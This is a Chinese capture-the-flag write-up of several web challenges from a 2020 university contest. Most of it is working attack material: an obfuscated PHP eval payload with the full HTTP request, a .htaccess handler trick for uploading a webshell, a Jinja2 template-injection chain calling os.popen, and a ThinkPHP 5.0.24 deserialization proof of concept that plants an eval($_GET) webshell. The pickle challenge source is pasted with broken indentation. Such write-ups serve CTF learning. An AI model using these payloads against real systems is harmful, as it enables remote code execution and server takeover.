CUMT2020-岁末赛

WEB

EZ_JS

image-20201224123233716image-20201224123233716

image-20201224123259063image-20201224123259063

这里有个好用的颜码解码网站:https://www.qtool.net/decode

EZ_RCE

爆破md5

import hashlib

for i in range(1000000000000000000000):
    i=str(i)
    h=hashlib.md5()
    h.update(i.encode(encoding='utf-8'))
    a = h.hexdigest()
    if( a[0:6] == "7b6db2" ):
        print(i)
        break
        
 //2708999
<?php
error_reporting(0);
if (!isset($_POST['code'])) {
    highlight_file(__FILE__);
} else {
    if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") {
        $str = $_POST['code'];
        $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '~', '%','=',';','\s', '*',"'", '"', '`', '\[', '\]', '\$', '_', '\\\\', '\^', ',','#','!','<','>'];
        // 没过滤 () . ? 数字 {}  / @ -  _
        foreach ($butaixing as $item) {
            if (preg_match('/' . $item . '/im', $str)) {
                die("臭弟弟,你想干啥?");
            }
        }
        eval('echo ' . $str . ';');
    }
}
?>

这题是 改的RCTF的一题 , 利用一些神奇的操作获得字母

直接给出payload,后期单独总结

# system(end(getallheaders()))
code = ((((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D)))(((((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))))(((((((1%2F0).(0))%7B0%7D)%7C(((1.1).(0))%7B1%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))))()))
payload:
POST /?pass=2708999 HTTP/1.1
Host: 219.219.61.234:50001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=u6qctifmhonae5lp6h3n1e51ot
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2106
a: cat /tmp/flag_is_here

code=((((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D)))(((((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))))(((((((1%2F0).(0))%7B0%7D)%7C(((1.1).(0))%7B1%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))))()))

image-20201224192839797image-20201224192839797

image-20201224193041277image-20201224193041277

EZ_upload

扫描目录

image-20201224201258096image-20201224201258096

访问可访问的目录

image-20201224201355301image-20201224201355301

hinit_1

image-20201225143656131image-20201225143656131

//hint_2  源码
<?php
session_start();
if (!isset($_POST['content']) || !isset($_POST['filename'])) {
    echo "Missing something";
    die();
}

$content = $_POST['content'];
$filename = $_POST['filename'];

if (!is_string($content) || strlen($content) > 125) {
    echo "content is too long!!!";
    die();
}
if (!is_string($filename) || strlen($filename) > 10) {
    echo "filename is too long!!!";
    die();
}
for ($i = 0; $i < 31; $i++) {
    if ($i !== 10 && stristr($content, chr($i))) {
        echo "only visible character ";
        die();
    }
}
for ($i = 127; $i < 256; $i++) {
    if (stristr($content, chr($i))) {
        echo "only visible character ";
        die();
    }
}
$content_blacklist = array("session",'set',"html", "type", "upload", "append", "prepend", "log", "script", "error", "include", "zend", "htaccess", "pcre", "\\", "\\\\","#", '>','=' );
foreach ($content_blacklist as $keywords) {
    if (stristr($content, $keywords)) {
        echo "Hacker";
        die();
    }
}
$filename_blacklist = array("ph", "ini",'pl','perl',"sh","py");
$append_string = "ohohohohohohohohoh!";
$yourdir = md5($_COOKIE['PHPSESSID']);
foreach ($filename_blacklist as $file_keys) {
    if (stristr($filename, $file_keys)) {
        echo "hacker";
        die();
    }
}
if (!is_dir($yourdir)) {
    @mkdir($yourdir);
}else {
    file_put_contents($yourdir . '/' . $filename, $content . $append_string);
    echo "file's path:  /var/www/html/".$yourdir . '/' . $filename;
}
?>
    
 // 过滤了AddType  setHandler  
payload:
上传 .htaccess
AddHandler application/x-httpd-php .aa ."" 123
//AddHandler 居然还能这么用……  涨知识


// "" 可以起到注释作用
然后使用短标签,传入后缀为.aa的文件,并且使用注释 // 

菜刀连接

image-20201230205613400image-20201230205613400

EZ_pickle

from flask import Flask, escape, request 
import pickle
import io 
import module_flag 
beifen=module_flag.sys.modules 
app = Flask(__name__) 
class RestrictedUnpickler(pickle.Unpickler): 
    def find_class(self, module, name): 
        blackList =["system", "os", "global", "popen", "pickle", 'eval', 'exec', 'Flask', 'request', 'open', 'io','get','command','attr','dict','modules'] 
        for b in blackList:
            if b in module or b in name: 
                raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)) 
                if module == 'module_flag' and (name[:1] != '_'): 
                    return getattr(module_flag.sys.modules['module_flag'], name) raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)) 
    def restricted_loads(s): 
        res = RestrictedUnpickler(io.BytesIO(s)).load() 
        print(module_flag.sys.modules) 
        module_flag.sys.modules = beifen 
        print(module_flag.sys.modules) 
        return str(res) 
@app.route('/') 
    def index(): 
        return 'view source /src' 
@app.route('/src') 
    def src(): 
        file = open("/src/app.py").read() 
        return file 
@app.route('/pickle') 
    def NoVulnPickle(): 
        try: 
            //代码偶尔能访问,逻辑错误,只过滤了system
            p = request.args.get("pickle") 
            blackList = ["system" ,"os" ,"popen" , "pickle", 'eval', 'exec', 'Flask', 'request', 'open', 'io','get','command','attr','dict','modules','global'] 
         for b in blackList: 
            if b in p: 
                return "hacker!" 
            else: 
                p = p.encode() 
                # print(p) 
                  return restricted_loads(p) 
        except Exception as e: 
            return 'failed' 
        return "OK" 
if __name__=="__main__": 
    app.run(debug=False,host = '0.0.0.0',port='5000')

看完代码,一脸懵逼,这题不会,寒假学习:anger: (寒假没了)

EZ_flask

//爆破md5
import hashlib

for i in range(100000000):
    i=str(i)
    h=hashlib.md5()
    h.update(i.encode(encoding='utf-8'))
    a = h.hexdigest()
    if( a[0:5] == "52491" ):
        print(i)
        break
     // 具体md5值按实际情况更改

测试发现题目中 {} 不能同时在一起 ,用户名和后面的参数我们可控,所以分开构造{}

// uasename={{" 
session:eyJoYXNoMSI6ImU0ODZhIiwicGFzc3dvcmQiOiIxODkxMzEwIiwic3RhdHVzIjoxLCJ1c2VybmFtZSI6Int7XCIifQ.X-YGjg.2-hzaxNZJk0O-889uMo3wnxMBkE

这里先直接贴出payload;考试后去学习

http://219.219.61.234:50007/"|attr("%c%c%c%c%c%c%c%c%c"%(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"%(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))(164)|attr("%c%c%c%c%c%c%c%c"%(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))("%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,98,117,105,108,116,105,110,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))("%c%c%c%c"%(101,118,97,108))("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,103,103,103,103,103,103,103,103,39,41,46,114,101,97,100,40,41))}}

EZ_thinkphp

扫描目录,发现源码

image-20201226123828906image-20201226123828906

// www\source\application\index\controller\index.php
<?php

namespace app\index\controller;

use think\Controller;

class Index extends Controller
{

    public function index()
    {
        $a=@unserialize(base64_decode($this->request->post('a')));
        return 'thinkphp 5.0.24';
    }

}
// 利用点 

参考文章 直接白嫖poc :airplane:

poc

<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{

}

class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query
    }
}

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){
        parent::__construct();
    }

}
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//目的调用其write()
        $this->styles = ['getAttr'];
    }
}

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#修改处
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output对象,目的是调用__call()
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation子类,且有getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();

    }
}

namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();
    }
}

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//目的调用File->set()
    }
}
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => 'php://filter/write=string.rot13/resource=./<?cuc cucvasb();riny($_TRG[pzq]);?>',
        'data_compress' => false,
        ];
        $this->tag ='abcdef';
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{


}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
//在index.php页面传入值
// 文件的名字是:传入内容+md5('tag_'+md5($tag)).php 并且部分需要urlcode转码
// <%3fcuc cucvasb()%3briny($_TRG[pzq])%3b%3f>468bc8d30505000a2d7d24702b2cda94.php

执行命令即可

image-20201226140139525image-20201226140139525

最后修改于:2021年03月31日 21:45

添加新评论